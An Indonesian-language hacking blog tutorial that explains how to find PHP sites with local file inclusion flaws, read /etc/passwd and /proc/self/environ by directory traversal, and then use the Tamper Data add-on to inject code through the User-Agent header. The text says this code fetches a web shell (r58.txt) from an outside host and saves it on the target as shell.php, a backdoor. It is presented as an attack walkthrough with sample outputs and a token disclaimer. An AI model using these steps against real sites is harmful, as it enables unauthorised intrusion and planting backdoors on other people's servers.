yang mau saya share di sini ialah tutorial or cara mengupload shell dari target LFI dengan Tamper Data.
########################################
fucking the Web Apps [LFI attack edition]
__________ .__ Author: Mygo __
\______ \| | _____ ____ | | __ _____ ___.__. ____ ____
| | _/| | \__ \ _/ ___\ | |/ / / \< | | / ___\ / _ \
| | \| |__ / __ \_\ \___ | < | Y Y \\___ |/ /_/ >( <_> )
|______ /|____/(____ / \___ >|__|_ \|__|_| // ____|\___ / \____/
\/ \/ \/ \/ \/ \/ /_____/
-=[ upload Shell via Target LFI dengan Tamper Data ]=-
1 – Pendahuluan
2 – Mencari Target LFI
3 – Memeriksa apakah proc / self / environ dapat diakses
4 – Mengupload code shell injection
5 – Akses shell or backdoor kita
=[1]= Pendahuluan
Dalam tutorial ini saya akan coba menunjukkan bagaimana Mencari or mendapatkan target LFI , setelah itu bagai bagaimana kita memanfaat kan target tersebut dan mengupload shell injection (backdoor) kedalam nya.
=[2]= Mencari Target LFI
=> Sekarang saya akan coba memberikan sample or contoh bagaimana cara menemukan target LFI , lets check it.
example: www[dot]target[dot]com/index.php?page=blablabla
=> sekarang kita coba mengganti file setelah ?page= (blablabla) dengan ../
example: www[dot]target[dot]com/index.php?page=../
Jika kita mendapatkan pesan error seperti ini:
Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1330
website or target tersebut kemungkinan besar can be attack with LFI .
untuk memastikan nya kita masuk ke step berikut nya yaitu mencoba meng access file /etc/passwd , for this step Lets make a request:
example: www[dot]target[dot]com/index.php?page=../…etc/passwd
jika kita masih mendapat kan pesan error yg sama seperti di atas , berarti kita perlu or coba menambahkan beberapa directory (../../) lagi sampai pesan error hilang dan kita success meng access or menampilkan isi dari file /etc/passwd
1 2 3 4 5 6 | contoh klw success akan muncul seperti ini: root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp: /sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin test:x:13:30:test:/var/test:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin |
sekarang mari kita periksa atau check apakah proc/self/environ dapat di access dengan cara mengganti /etc/passwd dengan proc/self/environ
contoh: www[dot]target[dot]com/index.php?page=../…etc/passwd <= change etc/passwd with proc/self/environ
it will be like this: www[dot]target[dot]com/index.php?page=../…lf/environ
jika success atau proc/self/environ dapat di access , maka kita akan mendapat pesan seperti berikut:
1 2 3 4 5 6 7 8 9 | DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www[dot]website[dot]com HTTP_REFERER=http://www[dot]website[dot]com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@website[dot]com SERVER_NAME=www[dot]website[dot]com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE= Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at http://www[dot]website[dot]com Port 80 |
NB: kemungkinan lain yg menyebab kan proc/self/environ tidak dapat di access ialah web or target kita menggunakan OS (operating system) FreeBSD
=[4]= Mengupload code shell injection (backdoor)
Di step ini kita akan mencoba mengupload shell injection (backdoor) kita ke dalam target yg tadi atau target yg proc/self/environ dapat di access.
Bagaimana caranya ?
Di sinilah peran Tamper data di perlukan.Apa itu Tamper Data ?
NB: Tamper data ialah salah satu Add-ons pada browser mozila yg dapat kita gunakan untuk mengganti user agent atau HTTP Header.
Bagaimana cara menggunakan nya ?
Download dan install terlebih dahulu Tamper Data pada Add-ons mozila anda download here => //addons[dot]mozilla[dot]org/en-US/firefox/addon/966
setelah tamper data di install , buka tamper data dan pada User-Agent masukan command code sebagai berikut:
NB: arizonafusion dapat anda ganti dengan link injection anda sendiri jika anda punya atau tidak ingin memakai injection tersebut
command code tersebut akan men-download file r58.txt dari arizonafusion.com dan otomatis tersimpan dengan nama shell.php.
jika tidak bekerja coba exec () karena sistem () dapat dinonaktifkan pada webserver dari php.ini
=[5]= Check or Akses shell backdoor kita
Sekarang mari kita periksa apakah script shell (backdoor) kita berhasil atau tersedia pada web target tadi dengan cara membuka:
www[dot]target[dot]com/shell.php
Jika success maka kita akan melihat tampilan backdoor shell kita
This Tutorial is writen for educational purpose only , Author will be not responsible if any damage.
No comments:
Post a Comment